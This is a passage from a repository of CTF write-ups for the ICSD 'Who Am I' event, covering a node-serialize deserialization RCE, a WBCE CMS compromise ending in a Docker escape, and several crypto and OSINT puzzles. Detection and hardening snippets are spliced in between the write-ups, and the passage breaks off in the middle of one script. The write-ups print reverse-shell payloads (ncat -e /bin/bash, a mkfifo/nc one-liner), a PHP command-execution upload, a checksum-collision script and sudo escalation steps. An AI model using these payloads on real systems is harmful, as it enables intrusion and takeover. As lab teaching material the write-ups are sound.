To begin your code review, start with the ```app.js``` file. In the ```app.js``` file, you'll again notice a warning comment regarding the ```node-serialize``` package.

![image](./images/2024-09-27_22h13_01.png)

To identify what the node-serialize package is vulnerable to, you can search online. You'll discover that it has a critical vulnerability: arbitrary remote code execution, which is explained at the following link. This vulnerability specifically affects the ```unserialize``` function, according to the explanation.
https://security.snyk.io/vuln/npm:node-serialize:20170208

Knowing that the web application is vulnerable to remote code execution, you can examine the source code further to find out where and how the ```node-serialize``` package is used.
By searching in the ```app.js``` file, you'll find that the vulnerable package is passed to the ```home``` router after being imported.

![image](./images/2024-09-25_17h45_54.png)

To understand how and for what functionality of the web application the ```node-serialize``` package is used, open the JavaScript file responsible for the home page.
Upon reviewing the code, two key points emerge:
* When a user searches for a keyword, it is taken from the request, serialized, and stored in a cookie named ```last_search```.
* During each GET request to the home page, the value of the ```last_search``` cookie is retrieved, **_UNSERIALIZED_** (which is the vulnerable part), and passed to the client side to be displayed.

This functionality allows users to see their most recent search by storing its value in a cookie.

![image](./images/2024-09-25_17h54_27.png)

In the image below, you can see an example usage of this functionality.

![image](./images/2024-09-25_18h12_04.png)

As your next step, you have to craft a payload that will execute system commands on the target website.
You can find an example payload at the link provided earlier.

```javascript
{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}
```

To adjust the payload for our target application, we need to strip away the dictionary structure and remove the enclosing double quotes and escape characters, leaving only the core payload.

To test if the payload works, we can attempt to ping our attacking machine and verify whether the injected system command is executed. To detect the ping requests, start ```tcpdump``` on the attacker machine to monitor ICMP traffic.
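From the defender's side, the `last_search` cookie is the control to watch: a serialized function carries the `_$$ND_FUNC$$_` marker and ends in `()` so that `unserialize()` invokes it on the next home-page request. The Python below is an added example, not part of the original writeup or of the challenge application: it flags such cookie values in constructed request-log lines (the log format is assumed) and shows the safe replacement for the read path, which is to parse the cookie as a JSON string and never as code. The sample payload is built in the shape the writeup uses, with the harmless `ls /` command from the Snyk advisory example.

```python
import json
import re
from urllib.parse import quote, unquote

# node-serialize prefixes serialized functions with this marker; a trailing "()"
# turns the string into an IIFE that unserialize() evaluates.
FUNC_MARKER = "_$$ND_FUNC$$_"
IIFE_TAIL = re.compile(r"\}\s*\(\s*\)\s*$")
CHILD_PROCESS = re.compile(
    r"require\s*\(\s*['\"]child_process['\"]\s*\)|\b(?:exec|execSync|spawn)\s*\("
)
COOKIE_RE = re.compile(r"last_search=([^;\s]+)")

# Constructed payload in the writeup's shape, URL-encoded as a browser would send it.
PAYLOAD_TEXT = ("_$$ND_FUNC$$_function (){require('child_process').exec('ls /', "
                "function(error, stdout, stderr) { console.log(stdout) });}()")
MALICIOUS_COOKIE = quote(PAYLOAD_TEXT, safe="")
BENIGN_COOKIE = quote('"naruto"', safe="")   # what a normal search keyword looks like

# Constructed request-log lines for the demo (format assumed).
SAMPLE_REQUEST_LOGS = [
    f"GET / HTTP/1.1 cookie=last_search={BENIGN_COOKIE}",
    f"GET / HTTP/1.1 cookie=last_search={MALICIOUS_COOKIE}",
    "GET /dev/notes.txt HTTP/1.1 cookie=-",
]


def classify_cookie_value(raw: str) -> dict:
    """Break the verdict into the three signals a detection rule would key on."""
    value = unquote(raw)
    has_marker = FUNC_MARKER in value
    return {
        "func_marker": has_marker,
        "iife": has_marker and bool(IIFE_TAIL.search(value)),
        "child_process": bool(CHILD_PROCESS.search(value)),
    }


def is_malicious(raw: str) -> bool:
    signals = classify_cookie_value(raw)
    return signals["func_marker"] or signals["child_process"]


def scan_log_lines(lines) -> list:
    """Indices of log lines whose last_search cookie carries a serialized-function payload."""
    hits = []
    for idx, line in enumerate(lines):
        m = COOKIE_RE.search(line)
        if m and is_malicious(m.group(1)):
            hits.append(idx)
    return hits


def last_search_from_cookie(raw: str) -> str:
    """Safe read path: the cookie must decode to a JSON *string*. json.loads never
    yields executable code, and anything else (or the marker) is rejected."""
    value = unquote(raw)
    if FUNC_MARKER in value:
        raise ValueError("serialized function in cookie")
    parsed = json.loads(value)
    if not isinstance(parsed, str):
        raise ValueError("last_search must be a JSON string")
    return parsed[:200]
```

The marker check alone is enough to catch the payload family the advisory describes; the `child_process` regex is there so that a cookie which smuggles `exec(` in some other wrapper still surfaces in the log scan.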

```javascript
_$$ND_FUNC$$_function (){require('child_process').exec('ping <attacker IP> -c 3', function(error, stdout, stderr) { console.log(stdout) });}()
```

Keep in mind that for successful code execution, the payload must first be sent to the web application. After that, you need to send another search keyword. This way, the payload becomes your previous search query and gets unserialized when accessing the home page. The vulnerability, as mentioned earlier, lies in the unserialize function of the package, not the serialize function.

Once the payload above is injected, you will observe six ICMP packets: three requests and three replies.

![image](./images/2024-09-25_18h22_19.png)

Having confirmed that the payload works, you can modify it to get a reverse shell.

```javascript
_$$ND_FUNC$$_function (){require('child_process').exec('ncat <attacker IP> <attacker Port> -e /bin/bash', function(error, stdout, stderr) { console.log(stdout) });}()
```

Upon injection of the payload above, you will get a reverse shell as the "www-data" user, which will enable you to grab the second flag for the CTF.

![image](./images/2024-09-25_18h24_52.png)
![image](./images/2024-09-25_18h35_11.png)

Moving on, you can start looking around for a vulnerability/misconfiguration leading to privilege escalation.
As a result of executing the ```sudo -l``` command, you can see that the www-data user is allowed to run the following command with ```sudo``` privileges.

```
/usr/bin/apt edit-sources ../*
```
![image](./images/2024-09-25_18h30_58.png)

Executing the command ```sudo /usr/bin/apt edit-sources ../foo``` will present you with multiple options to choose a text editor. For privilege escalation, you can select either ```nano``` or ```vim```.
Since these editors will run with sudo privileges, you can implement techniques to escalate your privileges. Both editors have techniques for privilege escalation, which you can find in the following links: 125 | 126 | https://gtfobins.github.io/gtfobins/vim/#sudo 127 | 128 | https://gtfobins.github.io/gtfobins/nano/#sudo 129 | 130 | ![image](./images/2024-09-25_18h33_34.png) 131 | 132 | As a result, you will gain elevated privileges on the target machines under the root user and will be able to read the last flag for the CTF. 133 | 134 | ![image](./images/2024-09-25_18h34_12.png) -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h29_25.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_17.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_48.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h30_48.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C11 - Serial Escape/images/2024-09-25_17h31_16.png: -------------------------------------------------------------------------------- 
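The root cause above is that attacker-controlled cookie data reaches ```node-serialize```'s ```unserialize()```. The block below is an added example, not code from the challenge application or from the ```node-serialize``` package: it shows how the ```last_search``` cookie can be read back without ever evaluating it (plain ```JSON.parse``` plus a check on the shape of the result), and a small scanner that flags request lines whose cookie carries the ```_$$ND_FUNC$$_``` marker. The cookie format (the JSON produced by serializing a plain string), the 100-character keyword limit, the function names and the sample header lines are all assumptions constructed for this example.

```javascript
// Added example (not code from the challenge app or from node-serialize):
// handling the last_search cookie without evaluating its contents.
// Assumptions: the cookie holds the JSON that serialize() produces for a plain
// string, and the home page only needs a bounded search keyword back.

// node-serialize prefixes a serialized function with this marker and, inside
// unserialize(), passes any string that starts with it to eval(). A trailing
// "()" in the payload turns the function into an IIFE that runs at that moment.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Detection: walk a parsed value (string, array or object) and report whether
// any string inside it carries the function marker.
function containsSerializedFunction(value) {
  if (typeof value === 'string') return value.includes(FUNC_MARKER);
  if (Array.isArray(value)) return value.some(containsSerializedFunction);
  if (value !== null && typeof value === 'object') {
    return Object.values(value).some(containsSerializedFunction);
  }
  return false;
}

// Hardened replacement for unserialize(req.cookies.last_search): JSON.parse
// never executes code, and the result is validated against the only shape the
// page needs (one short string). Returns the keyword, or null when the cookie
// is absent, oversized, malformed, of the wrong type or carries the marker.
function parseLastSearchCookie(raw, maxLen = 100) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 1024) return null;
  let parsed;
  try {
    parsed = JSON.parse(raw);
  } catch {
    return null;
  }
  if (typeof parsed !== 'string' || parsed.length > maxLen) return null;
  if (containsSerializedFunction(parsed)) return null;
  return parsed;
}

// Log review: given raw Cookie header lines, return the indices of those whose
// last_search value carries the marker (the value is URL-decoded first, as a
// browser would have encoded it).
function findSuspiciousCookieLines(lines) {
  const hits = [];
  lines.forEach((line, i) => {
    const m = /\blast_search=([^;]*)/.exec(line);
    if (!m) return;
    let value = m[1];
    try { value = decodeURIComponent(value); } catch { /* keep the raw value */ }
    if (value.includes(FUNC_MARKER)) hits.push(i);
  });
  return hits;
}

// Constructed sample header lines (not captured traffic) for a stand-alone run.
const SAMPLE_COOKIE_LINES = [
  'Cookie: last_search=%22ssh%20config%22; theme=dark',
  'Cookie: theme=dark',
  'Cookie: last_search=%22_%24%24ND_FUNC%24%24_function%20()%7Breturn%201%7D()%22',
];
```

Usage: `parseLastSearchCookie('"ssh config"')` returns `ssh config`, the same call on a serialized-function payload returns `null`, and `findSuspiciousCookieLines(SAMPLE_COOKIE_LINES)` returns `[2]`. The real fix for the application is simply never to call ```unserialize()``` on data a client can set; the scanner is there for reviewing past access logs for the same marker.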
-------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/README.md: --------------------------------------------------------------------------------
Exploit the vulnerabilities and gain root access to the machine.
-------------------------------------------------------------------------------- /Who Am I/Writeups/C12 - Mr. Windoclin/Writeup.md: --------------------------------------------------------------------------------
# INFO

This CTF was designed by Elnur Badalov and was Challenge №12 in ICSD's CTF event "Who am I" held on `20.09.2024`.

This write-up will show the solution to this CTF challenge.

# Reconnaissance
## NMAP Scan
```bash
nmap -p- -sS -sC -sV 10.0.10.25 -v --min-rate 10000
# result
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.255.1.18
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Cant get directory listing: PASV IP 172.17.0.2 is not the same as 10.0.10.25
22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 43:eb:24:ea:01:e5:d2:e0:55:4d:37:95:3c:ac:6a:6e (ECDSA)
|_  256 97:33:4e:15:41:32:8c:32:86:6c:c3:b6:5c:be:fa:d9 (ED25519)
80/tcp   open  http          Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-title: CMC - A test post to test CMS
|_Requested resource was http://10.0.10.25/wbce/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-generator: WBCE CMS; https://wbce.org
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WINDOCL-GI0DS47
| Issuer: commonName=WINDOCL-GI0DS47
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-09-11T00:50:52
| Not valid after:  2025-03-13T00:50:52
| MD5:   8043:0cbe:6a96:c2d8:61fb:7dea:c545:61df
|_SHA-1: 2771:80d5:854a:3296:0f47:7072:934c:86d1:a095:44fd
|_ssl-date: 2024-09-23T06:33:02+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: WINDOCL-GI0DS47
|   NetBIOS_Domain_Name: WINDOCL-GI0DS47
|   NetBIOS_Computer_Name: WINDOCL-GI0DS47
|   DNS_Domain_Name: WINDOCL-GI0DS47
|   DNS_Computer_Name: WINDOCL-GI0DS47
|   Product_Version: 10.0.20348
|_  System_Time: 2024-09-23T06:33:01+00:00
```
4 ports are open:
- 21 - `vsftpd 2.3.4`. It has a public exploit for getting RCE.
- 22 - SSH.
- 80 - a web app (a CMS).
- 3389 - RDP, which suggests a Windows machine.
## FTP Reveals a Hidden File

FTP allows anonymous login, and we find a hidden file `.note.txt`. We can download it using the `get` command.
![image](./images/ftp-session.png)
It has the following note:\
```
You could ask me to give you a virtual machine in the Cloud. Why are you doing such weird thing, Mr. Windoclin? Who setups Windows Server that way?

Additionally, add me to the Github Repository as a Contributor.
```
Here, we learn that the user's name is `Windoclin` and that he did something extraordinary with Windows. Additionally, he may have a GitHub account.

### Rabbit Hole

Although the FTP service seems exploitable (vsftpd 2.3.4 has a public exploit for backdoor command execution via CVE-2011-2523), it is a **rabbit hole** and won't be useful.
## Github OSINT
Searching for `windoclin` on GitHub reveals a repository that points to his profile.
![image](./images/github-osint.png)
We discover another repo called *autotask*:
- https://github.com/windoclin/autotask
![image](./images/github-osint-2.png)
It contains automation scripts that leak credentials:
![image](./images/github-osint-3.png)
```python
...
username = "supascrtadminus3r"
password = "supascrtp4ssw0rd!!"
...
```
# CMS
## Recon
When we send a GET request to the IP, it redirects to `http://10.0.10.25/wbce/`.
![image](./images/cms-redirects.png)
If we request the new URL again (or navigate to it in a browser), we see it requires resources from `http://windoclin/wbce`. This indicates we need to add the `windoclin` hostname to the `/etc/hosts` file.
![image](./images/cms-hostname-revealed.png)
`wbce` in the URL suggests that the CMS in use is WBCE.
![image](./images/wbce-cms.png)
This CMS does exist, and it has several public exploits available.
![image](./images/wbce-cms-googled.png)
## CMS Admin Access
By checking some common directory names, we can find the **admin portal** of the CMS, where we can log in using the credentials found earlier.
![image](./images/cms-admin-panel.png)
From the admin dashboard, we find the following information: `WBCE Version: 1.6.2`.
## RCE
We use the following exploit:
- https://github.com/capture0x/WBCE_CMS/

To get RCE, navigate to **Add-ons**, then **Languages**, and **install a language**.
![image](./images/cms-admin-dashboard.png)
Let's try a simple payload:
```php
<?php system('whoami');?>
```
Write this to a PHP file, upload it, and click **Install**.
![image](./images/cms-rce.png)
The exploit succeeded! We got `nt authority\system`, which is the highest privilege on the system.
### Reverse Shell
For a reverse shell, I used this exploit:
- https://github.com/ivan-sincek/php-reverse-shell
Modify the port and IP and repeat the steps:
![image](./images/cms-reverse-shell.png)
# Windows Enumeration
Let's check the Desktop of the **windoclin** user:
![image](./images/windows-enum.png)
We find a shortcut to a folder located on a network share: `\\host.lan`.
```powershell
net view \\host.lan
# gives
...
Data   Disk    Shared
...

# next, mount the share
net use Z: \\host.lan\Data

# cd there
Z:
Z:\>dir
 Volume in drive Z is Data
 Volume Serial Number is AC24-E051

 Directory of Z:\

09/12/2024  09:19 AM    <DIR>          .
09/12/2024  09:19 AM    <DIR>          ..
09/12/2024  02:36 AM        21,846,505 1.6.2.zip
09/12/2024  09:12 AM             2,468 healthy.sh
09/12/2024  10:25 AM               665 prevention.sh
09/12/2024  09:19 AM               166 README.MD
09/11/2024  10:19 AM                 7 user.txt
01/30/2024  11:47 PM    <DIR>          WBCE_CMS-1.6.2
```
Congratulations! We found `user.txt`!
![image](./images/windows-shared-folder.png)
# Windows Docker Escape
Three files interest us:
- `README.MD`
  - It contains `6238383731656632663334623638393836333933353130373530653833323635`, which decodes from hex to `b8871ef2f34b68986393510750e83265`.
````markdown
# A Note from Mr. Windoclin
```
6238383731656632663334623638393836333933353130373530653833323635
```

Do not modify the `healthy.sh`, otherwise it will not run**!**
````
- `prevention.sh`
  - This is a custom script designed to prevent another script from being executed if it has been overwritten.
```bash
#!/bin/bash

if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <script_to_run> <expected_md5_prefix>"
    exit 1
fi

script_to_run=$1
the_md5=$2

if [ ! -f "$script_to_run" ]; then
    echo "Error: The script '$script_to_run' does not exist."
    exit 1
fi

actual_md5_prefix=$(md5sum "$script_to_run" | awk '{print $1}' | cut -c 1-4)
expected_md5_prefix=$(echo "$the_md5" | awk '{print $1}' | cut -c 1-4)

if [ "$actual_md5_prefix" == "$expected_md5_prefix" ]; then
    echo "MD5 checksum matches. Running the script..."
    bash "$script_to_run"
else
    echo "MD5 checksum does not match. Expected '$expected_md5_prefix', but got '$actual_md5_prefix'."
    exit 1
fi
```
- `healthy.sh`
  - This script runs regular health checks. Using the following command, we can get its MD5 checksum:
```powershell
certutil -hashfile .\healthy.sh MD5
# result
MD5 hash of .\healthy.sh:
b8871ef2f34b68986393510750e83265
```

The MD5 hash `b8871ef2f34b68986393510750e83265` matches the one in the `README.MD` file.

Overall, the mechanism implemented here performs regular health checks from a machine that connects to the shared folder. It also employs an *insecure* method for preventing the execution of an overwritten file, as it only compares the first 4 hex characters (16 bits) of the MD5 hash, so a modified file that happens to share those 4 characters is expected after roughly 65,536 attempts. This makes it vulnerable to a brute-force attack using the following script:

`brute.sh`
```bash
#!/bin/bash

# prepare the payload
FILE_PATH="shell.sh"
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.0.10.35 4444 >/tmp/f' > $FILE_PATH

TARGET_CHECKSUM="b887"

# append '#' to the end of the shell file until the first 4 characters match
while true; do
    CURRENT_CHECKSUM=$(md5sum "$FILE_PATH" | awk '{ print $1 }' | cut -c 1-4)

    if [ "$CURRENT_CHECKSUM" == "$TARGET_CHECKSUM" ]; then
        echo "The file's checksum now matches the target: $CURRENT_CHECKSUM"
        break
    fi

    echo -n "#" >> "$FILE_PATH"

done
```
After creating `shell.sh`, transfer it onto the target machine, which can be done via a Python HTTP server.
![image](./images/prepare-exploit.png)

Then, on the target machine, replace the file in `Z:/`:
```powershell
Invoke-WebRequest -Uri http://10.0.10.35:8000/shell.sh -OutFile healthy.sh
```

Set up a listener and wait for a connection.

Finally, voilà! We successfully obtain a shell and retrieve `root.txt`!
![image](./images/machine-exploited.png)
# Conclusion
By exploring further, we can find a `docker-compose.yml` file, which reveals that **Windows** is running as a **Docker container** on a **Linux** host. The shared folder we accessed earlier is mounted between the Linux host and the Docker container.
![image](./images/docker-compose-file.png)
![image](./images/shared-folder.png)

This was a non-standard Docker escape technique that leveraged weak file integrity checks.
-------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/README.md: --------------------------------------------------------------------------------
# Decode the Escape

Find the Flag.

```plaintext
"Some will call it practice, some will call that luck,
But either way you're going to the history books"

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
```

-------------------------------------------------------------------------------- /Who Am I/Writeups/C2 - Decode the Escape/Writeup.md: --------------------------------------------------------------------------------
# Solution

First of all, we need to search for the song lyrics given in the task. It's the song **Hall of Fame** by The Script:

![alt text](images/figure-1.png)

The secret message given to us is a Base58-encoded value:

![alt text](images/figure-2.png)

It looks like a cipher. As we are given a song that can be used for some purpose, we can guess that the ciphertext is the result of a Vigenère cipher.

***But what is the key?***

Let's try the song name - "**halloffame**" - and see the result:

![alt text](images/figure-3.png)

Yes, it is the right key! We are given another message:

**"Happiness can be found, even in the darkest of times, if one only remembers to turn on the light."**

**How can you fight off this prison's guards?**

The first quote is from "Harry Potter and the Prisoner of Azkaban", which can be found with a little Google search:

![alt text](images/figure-4.png)

As we can guess, Azkaban is the name of a prison. So we need to conduct another search to find out how we can fight off the guards of this prison.

The guards of Azkaban are called **Dementors**:

![alt text](images/figure-5.png)

We can fight off Dementors with...

![alt text](images/figure-6.png)

The Patronus Charm! Good. We have collected some information, so let's analyze the secret message. It is another Base64-encoded value:

![alt text](images/figure-7.png)

Well, it does not work. We have to look for another way.

However, searching for the Patronus charm on Google gives something juicy:

![alt text](images/figure-8.png)

Let's raise the wands and say the magic words:

![alt text](images/figure-9.png)

The spell worked! Challenge solved! 🪄🪄🪄

Flag: **`ICSD_2024{a9Vb44x55wLt4Pn8KrHd}`**
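The first two steps of this solution (Base58 decode, then Vigenère decryption with the key `halloffame`) were done in CyberChef; the block below is an added example, not part of the original write-up, implementing the same pipeline in code so it can be reproduced offline. The challenge's real ciphertext is not reproduced here: the sample is constructed by encrypting a made-up plaintext with the same key, and the function names and the conventions (Bitcoin Base58 alphabet, non-letters passed through without consuming a key letter) are this example's own choices.

```javascript
// Added example (not from the write-up): Base58 decode followed by Vigenère
// decryption with the key "halloffame", the two steps the solution describes.
// The challenge ciphertext is not included; the sample below is constructed.

const B58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz';

// Base58 encode (Bitcoin alphabet): big-number base conversion, plus one '1'
// per leading zero byte, since leading zeros carry no value numerically.
function base58Encode(bytes) {
  let n = 0n;
  for (const b of bytes) n = n * 256n + BigInt(b);
  let out = '';
  while (n > 0n) {
    out = B58_ALPHABET[Number(n % 58n)] + out;
    n /= 58n;
  }
  let zeros = 0;
  for (const b of bytes) { if (b !== 0) break; zeros++; }
  return '1'.repeat(zeros) + out;
}

// Base58 decode to a Buffer; characters outside the alphabet (0, O, I, l are
// deliberately absent from it) are rejected rather than silently skipped.
function base58Decode(str) {
  let n = 0n;
  for (const ch of str) {
    const idx = B58_ALPHABET.indexOf(ch);
    if (idx < 0) throw new Error(`invalid Base58 character: ${ch}`);
    n = n * 58n + BigInt(idx);
  }
  const bytes = [];
  while (n > 0n) {
    bytes.unshift(Number(n % 256n));
    n /= 256n;
  }
  let zeros = 0;
  for (const ch of str) { if (ch !== '1') break; zeros++; }
  return Buffer.from([...new Array(zeros).fill(0), ...bytes]);
}

// Classic Vigenère over A-Z / a-z. Non-letters pass through unchanged and do
// not consume a key letter; the case of each plaintext letter is preserved.
function vigenere(text, key, decrypt = false) {
  const k = key.toLowerCase().replace(/[^a-z]/g, '');
  if (k.length === 0) throw new Error('key must contain at least one letter');
  let out = '';
  let j = 0;
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    const isUpper = code >= 65 && code <= 90;
    const isLower = code >= 97 && code <= 122;
    if (!isUpper && !isLower) { out += ch; continue; }
    const base = isUpper ? 65 : 97;
    const shift = k.charCodeAt(j % k.length) - 97;
    const s = decrypt ? 26 - shift : shift;
    out += String.fromCharCode(base + ((code - base + s) % 26));
    j++;
  }
  return out;
}

// The write-up's pipeline in one call: Base58 text -> bytes -> UTF-8 -> Vigenère decrypt.
function decodeChallengeMessage(b58Text, key) {
  return vigenere(base58Decode(b58Text).toString('utf8'), key, true);
}

// Constructed sample: part of the quote the solution recovers, encrypted with
// "halloffame" and Base58-encoded so the decoder can be exercised offline.
const SAMPLE_PLAINTEXT = 'Happiness can be found, even in the darkest of times.';
const SAMPLE_CIPHERTEXT = base58Encode(Buffer.from(vigenere(SAMPLE_PLAINTEXT, 'halloffame'), 'utf8'));
```

Usage: `decodeChallengeMessage(SAMPLE_CIPHERTEXT, 'halloffame')` returns `SAMPLE_PLAINTEXT`; as a hand-checkable vector, `vigenere('ATTACK', 'halloffame')` is `HTELQP`. Because Base58 has no fixed-width groups, an input that decodes to non-printable bytes is the quickest sign that a message is not Base58 after all, which is the kind of failure the later Base64 attempt in this write-up ran into.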
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C2 - Decode the Escape/images/figure-9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/README.md:
--------------------------------------------------------------------------------
**C3 - ANAIS_WATT3RS0N**

*Anais Watterson's beloved donkey doll was thrown from a school bus by other children. Unfortunately, Anais has lost not only a beloved toy but also a hidden flag within it that holds great importance to her. Now she needs your assistance to retrieve it. Anais has created a Twitter account to share clues and reach as many people as possible to aid in the search. Your mission is to retrace the hints, find the doll, and bring it back. Ready to help Anais recover her treasured possession and restore her smile?*

![image.png](images/image1.png)

--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/Writeup.md:
--------------------------------------------------------------------------------
# C3 - ANAIS_WATT3RS0N

The description mentions that Anais created a Twitter account, and the challenge name looks like a username. Searching for it on Twitter (R.I.P.) turns up an account:

![image.png](images/image2.png)

Browsing through it, we noticed that Anais first asked for help, and later found some strange, unreadable text stuck to her door:

![image.png](images/image3.png)

From its format, we suspected it was encoded with one of the Base-N encodings, so we used CyberChef (https://gchq.github.io/CyberChef/) to decode it:

![image.png](images/image4.png)

Voilà! We finally cracked it.
It revealed the name of a location: Mare Island San Pablo Bay Hiking Trail. We searched for it on Google Maps:

![image.png](images/image5.png)

In these kinds of puzzles the interesting clues usually hide in the comments section, so we looked there (sorted by newest):

![image.png](images/image6.png)

That's when we discovered that Tina, the fearsome bully of Elmore Junior High, had taken Anais's doll. But did you know Tina did it because she couldn't sleep at night? Now you know both the flag and the reason behind her actions.
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am
I/Writeups/C3 - ANAIS_WATT3RS0N/images/image4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C3 - ANAIS_WATT3RS0N/images/image6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/README.md:
--------------------------------------------------------------------------------
## #exec cmd="whoami"

### Task

Analyze the picture and answer the questions.

![OSINT Picture](images/figure-1.png)

**Question 1.** Who is the owner of this picture?

**Question 2.** What is his email address?

**Question 3.** Which country is he living in?

**Question 4.** Find the flag.

--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/Writeup.md:
--------------------------------------------------------------------------------
# Solution

**Question 1.** Who is the owner of this picture?

Extracting the picture's EXIF metadata is enough to answer this:

![alt text](images/figure-2.png)

**ANSWER**: **Marko Ivan Marojević**

---

**Question 2.** What is his email address?

Looking at the picture closely, a GitHub logo is clearly visible.
So we search for Marko Ivan on GitHub.

Searching for **Marko Ivan Marojević** on GitHub:

![alt text](images/figure-3.png)

Marko Ivan's GitHub profile:

![alt text](images/figure-4.png)

From the profile page we can collect information such as where he studies, where he works, and how to contact him.

**ANSWER**: **ivan.marojevic@prvabankacg.com**

---

**Question 3.** Which country is he living in?

We can see that Marko is an intern at “Prva banka Crne Gore AD” in Podgorica. Podgorica is the capital city of Montenegro.

**ANSWER**: **Montenegro**

---

**Question 4.** Find the flag.

There is a repository in Marko’s profile:

![alt text](images/figure-5.png)

And the note left on Marko’s profile page reads:

![alt text](images/figure-6.png)

***Sometimes it is good to retrospect…*** This suggests that we should look into something history-related.
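Once a repository's history is the suspect, the search can be automated instead of clicking through commits by hand. The script below is an added example, not code from this writeup or from the challenge repository: it walks `git log -p` output, pulls out Base64/Base32/hex-looking tokens, tries each decoding, and reports anything that decodes to a flag-shaped string. The same `try_decodings` helper covers the Base-N note from C3 and the Base64 value found here in C4. The sample log and the flag inside it are constructed for the demo; only the `ICSD_2024{...}` shape is taken from the page.

```python
"""Scan git history for encoded secrets (added example, not from the writeup).

The sample log below is constructed; the flag in it is a placeholder, not the
challenge's real flag. Only the ICSD_2024{...} shape is taken from the page.
"""
import base64
import binascii
import re
import subprocess

FLAG_RE = re.compile(r"[A-Z0-9_]+\{[^}\s]+\}")          # flag-shaped text, e.g. ICSD_2024{...}
TOKEN_RE = re.compile(r"[A-Za-z0-9+/=_-]{16,}")         # runs of Base64/Base32/hex alphabet characters


def try_decodings(token: str) -> dict:
    """Try the common Base-N decodings; return {encoding: text} for those that
    yield printable UTF-8. Missing '=' padding is tolerated, duplicates dropped."""
    attempts = {
        "base64": lambda t: base64.b64decode(t + "=" * (-len(t) % 4), validate=True),
        "base64url": lambda t: base64.urlsafe_b64decode(t + "=" * (-len(t) % 4)),
        "base32": lambda t: base64.b32decode(t.upper() + "=" * (-len(t) % 8)),
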